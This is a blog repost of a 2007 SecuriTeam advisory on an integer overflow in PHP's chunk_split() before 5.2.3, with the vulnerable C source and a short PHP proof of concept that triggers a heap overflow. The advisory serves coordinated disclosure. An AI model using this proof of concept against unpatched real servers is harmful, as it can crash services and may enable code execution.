Search This Blog

Sunday, June 03, 2007

[UNIX] PHP chunk_split() Integer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

PHP chunk_split() Integer Overflow
------------------------------------------------------------------------


SUMMARY

PHP is "a widely-used general-purpose scripting language that is
especially suited for Web development". The parameters chunks, srclen and
chunklen are used without any check in a memory allocation statement. Due
to a possible integer overflow this can result in the allocation of a too
small buffer which leads to a heap overflow. This crashes the php process
and may allow execution of arbitrary code.

DETAILS

Vulnerable Systems:
* PHP versions prior to 5.2.3

Immune Systems:
* PHP version 5.2.3 and newer

In line 1963 the chunk_split function tries to allocate the adequate size
of memory for the result of the function. In case the values chunks and
endlen are bigger than 65534 an integer overflow is triggered and the
wrong size of memory is allocated, which results in a heap overflow.

ext/standard/string.c:
1953 static char *php_chunk_split(char *src, int srclen, char *end, int
endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }

Proof of concept:
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

Vendor status:
Vendor notified: 2007-05-29
Vendor response: 2007-05-29
Patch available: 2007-06-01
Coordinated disclosure: 2007-06-01


ADDITIONAL INFORMATION

The information has been provided by <mailto:research@sec-consult.com>
Gerhard Wagner.
The original article can be found at:
<http://www.sec-consult.com/fileadmin/Advisories/20070601-php_chunk_split.txt> http://www.sec-consult.com/fileadmin/Advisories/20070601-php_chunk_split.txt

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: